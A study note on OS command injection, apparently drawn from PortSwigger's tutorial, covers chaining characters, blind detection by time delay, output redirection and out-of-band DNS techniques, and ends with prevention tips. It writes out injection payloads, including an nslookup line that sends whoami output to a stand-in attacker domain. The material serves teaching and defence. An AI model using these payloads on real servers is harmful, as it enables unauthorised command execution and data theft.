# OS command injection

Source:[portswigger](https://portswigger.net/web-security/os-command-injection)

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

If there is no input defense against insection, simply by adding `;<command>` or Similar can run the command.Eg instead of `productId=1&storeId=1` if we change the parameter to `productId=1&storeId=1;whoami` the server will also run whoami command.

## Ways of injecting OS commands
Using special characters to chain commands.
- &
- &&
- |
- ||
- ;(only in unix-based)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

- \` injected command \`
- $( injected command )


## Blind OS command injection vulnerabilities
Here the output of the injection is not reflected on the webpage but are exploitable.

### Detecting blind OS command injection using time delays
If we trigger a time delay then from response time we can understand if it is vulnerable to OS command injection. Eg by adding `& ping -c 10 127.0.0.1 &` the response will take 10 secs.

### Exploiting blind OS command injection by redirecting output
If we execute `whoami` it will not get reflected on the response. So we can store the output of whoami by storing in another file.Eg `& whoami > /var/www/static/whoami.txt &`.

### Exploiting blind OS command injection using out-of-band (OAST) techniques
You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:
```
& nslookup kgji2ohoyw.web-attacker.com &
```
This payload uses the nslookup command to cause a DNS lookup for the specified domain. The attacker can monitor for the specified lookup occurring, and thereby detect that the command was successfully injected.

The out-of-band channel also provides an easy way to exfiltrate the output from injected commands:
```
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
```
This will cause a DNS lookup to the attacker's domain containing the result of the `whoami` command `wwwuser.kgji2ohoyw.web-attacker.com`


## How to prevent OS command injection attacks

- Validating against a whitelist of permitted values.
- Validating that the input is a number.
- Validating that the input contains only alphanumeric characters, no other syntax or whitespace.
